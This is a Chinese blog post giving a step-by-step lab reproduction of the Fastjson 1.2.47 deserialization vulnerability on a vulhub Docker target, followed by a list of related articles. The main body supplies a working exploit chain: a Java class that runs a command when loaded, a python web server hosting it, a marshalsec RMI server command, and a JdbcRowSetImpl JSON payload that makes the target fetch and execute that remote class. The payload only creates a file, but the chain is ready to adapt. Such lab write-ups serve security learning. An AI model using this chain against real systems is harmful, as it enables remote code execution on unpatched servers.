fastjson反序列化复现步骤

最新推荐文章于 2023-11-08 00:13:01 发布
最新推荐文章于 2023-11-08 00:13:01 发布
阅读量4.8k 收藏 13
点赞数 12
分类专栏: 安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527658/article/details/121975736
版权

环境搭建

靶机linux
攻击机windows
恶意代码存放和rmi/ldap的服务机linux

1.靶机环境搭建

需要搭建docker、docker-compose建议老版本(注意检验docker-compose的版本是否与本机的架构一致)、下载docker-compose到目录 /usr/local/bin/后  执行权限分配 sudo chmod 777 docker-compose

然后运行 ln -s  /usr/local/bin/docker-compose  /usr/bin docker-compose
   (1).继续进入vuln/fastjson/1.2.47目录下(漏洞环境需要下载vulnhub官网提供的复现环境)
    运行docker命令 docker-compose up -d
    环境默认已经启用 访问路径为ip:8090

2.攻击机,不做处理有burpsuite就行

3.服务机处理

(1).安装jdk(注意版本jdk8u181,配置环境变量),安装python3且配置环境变量 ,借用marshalsec.jar文件(开启rmi/ladp服务)marshalsec.jar文件可通过windows下载GitHub - mbechler/marshalsec的源码,然后通过windows上的maven对源码进行mvn clean package -DskipTests 编译即可生成 
     (2).编写恶意代码Exploit.java

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

 并且利用javac Exploit.java编译成Exploit.class文件

(3).将marshalsec.jar和Exploit.class放在同一个目录中,并再此目录下运行

python -m http.server 9999 命令搭建一个临时服务器,访问端口为
服务机ip:9999  可以访问验证下
(4).再看一个服务器ssh窗口,利用marshalsec.jar生成一个rmi或者ldap服务 运行命令为

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar  marshalsec.jndi.RMIRefServer "http://服务机ip:9999/#TouchFile" 9001

4.攻击机需要burp  抓靶机ip:8090包

利用burpsuiter的repeater重放功能

修改GET请求包为POST
修改name和age的值如下并提交
    
{
 
    "name":{
 
        "@type":"java.lang.Class",
 
        "val":"com.sun.rowset.JdbcRowSetImpl"
 
    },
 
    "age":{
 
        "@type":"com.sun.rowset.JdbcRowSetImpl",
 
        "dataSourceName":"rmi://服务机ip:9001/Exploit",
 
        "autoCommit":true
 
    }

5.靶机的服务下生成 success文件说明成功

靶机进入容器操作,docker exec -it 容器id /bin/bash

执行命令查看  ls /tmp/是否有success

退出容器输入exit

床前明月光,疑似地下霜
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson 序列漏洞
迷风小白
04-14 5245
Fastjson 序列漏洞 前言 因为之前并没有遇到过fastjson相关的漏洞,刚好这次有机会碰到了就顺便学习一下并记录自己踩过的坑。 漏洞原理 漏洞 这里漏洞环境主要是用vulhub上的两个fastjson漏洞搭建,搭建完成以后访问8090端口会出如下所示 漏洞利用需要我们在vps上启一个RMI服务并调用class文件,这些我们都可以在一台服务器上完成。 首先我们先创建命令执行...
FASTJSON序列
weixin_71604403的博客
03-01 1328
1.环境搭建一台kali(靶机)一台win(攻击机)kali换源# 官方源#根据需要自己选一个,中科大的还可以#中科大#阿里云#清华大学#浙大#东软大学#重庆大学进入/etc/apt目录编辑sources.list文件命令如下将原有的源注释,添加其他源,这里用的是阿里的随后进行更新apt-get update 更新索引apt-get upgrade 更新软件apt-get dist-upgrade 升级。
js解析杂json对象
niyehunwu的专栏
06-05 6521
json对象: {     "req": {         "method": "POST",         "url": "http://127.0.0.1:8081/banking-merchant-console/queryKeyByAcceptBizNoProcess.api",         "data": {             "acceptBizNo": "B
Fastjson序列审计及验证
二狗的博客
12-14 484
至此,Fastjson漏洞验证之旅已结束,通过DNSLog方式,我们证明了该地方存在Fastjson序列漏洞。在内网环境中,无法利用互联网的DNSlog进行漏洞验证。已确定了Fastjson版本存在问题,进一步寻找触发Fastjson的漏洞点。本项目引入的Fastjson版本为1.2.58,该版本存在序列漏洞。通过对各个页面的访问并抓包,找到propertyAddJson参数。这里我们优先结合方法一,方法二更适合get请求。字段中,点击发送数据包。方法,则这几处均存在序列
fastjson漏洞(fastjson≤1.2.80)
TVT111的博客
07-21 2724
文章利用JNDI-Injection-Exploit工具,主要讲解如何利用JNDI注入fastjson漏洞
fastjson漏洞
m0_63017769的博客
11-08 364
Fastjson是一个阿里巴巴开源的Java库(项目地址为:https://github.com/alibaba/fastjson),它用于将Java对象转换为JSON表示。它还可以用于将JSON字符串转换为等效的Java对象。Fastjson可以处理任意Java对象,并且它提供了高性能的JSON解析和序列功能。
Fastjson序列漏洞原理与漏洞(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 2万+
本文是Fastjson1.2.24漏洞,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
springmvc fastjson 序列时间格式方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列序列Java对象。当我们在处理日期时间字段时,可能会遇到序列时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
SpringBoot Redis配置Fastjson进行序列序列
10-16
在处理Java对象与Redis之间的转换时,序列序列是必不可少的步骤。本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列序列,以实与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的...
FastJson序列
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的序列方法,通过两个bean,进行封装
FastjsonScan:一个简单的Fastjson序列检测burp插件
04-13
FastjsonScan一个简单的Fastjson序列检测burp插件我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson序列问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说...
fastjson序列利用
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
Fastjson序列漏洞原理与
FisrtBqy的博客
05-15 3356
Ffasjson序列漏洞原理与
Fastjson 1.2.24 命令执行漏洞-JNDI简单实弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2550
Fastjson 1.2.24 命令执行漏洞-JNDI简单实弹shell,不拖泥带水,最简单的办法实弹shell与命令执行。
Fastjson序列漏洞
weixin_52501704的博客
01-02 2197
Fastjson序列漏洞
漏洞 - - - Fastjson序列漏洞
weixin_67503304的博客
08-25 6300
简单讲解Fastjson序列漏洞,简单讲述漏洞利用shell
fastjson利用
qq_43660551的博客
08-16 1527
进入target下,启动rmi服务:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.104:8080/#TouchFile" 2222。上传恶意文件到公网,在本机打开命令行,进入存放java文件的目录,javac TouchFile.java编译刚才的java文件,编译完成在当前目录下发class文件已经存在:TouchFile.class。至此,攻击环境准备好了。.....
【网路安全---漏洞Fastjson 1.2.24 命令执行漏洞-JNDI简单实弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1724
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列为JSON字符串,也可以从JSON字符串序列到JavaBean。即fastjson的主要功能就是将Java Bean序列成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久了。看了很多别人关于漏洞过程,很多博客过程简洁,有的过程过于杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞过程。
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
最新发布
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡等。这些功能可以帮助用户进行更杂的图像处理和分析。
fastjson序列
08-12
因此,要成功Fastjson序列漏洞,需要使用较旧的版本或者找到新的漏洞利用方式绕过这些安全措施。同时,在实际应用中,为了保证安全性,建议使用最新的Fastjson版本,并对输入进行严格的校验和过滤,以防止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值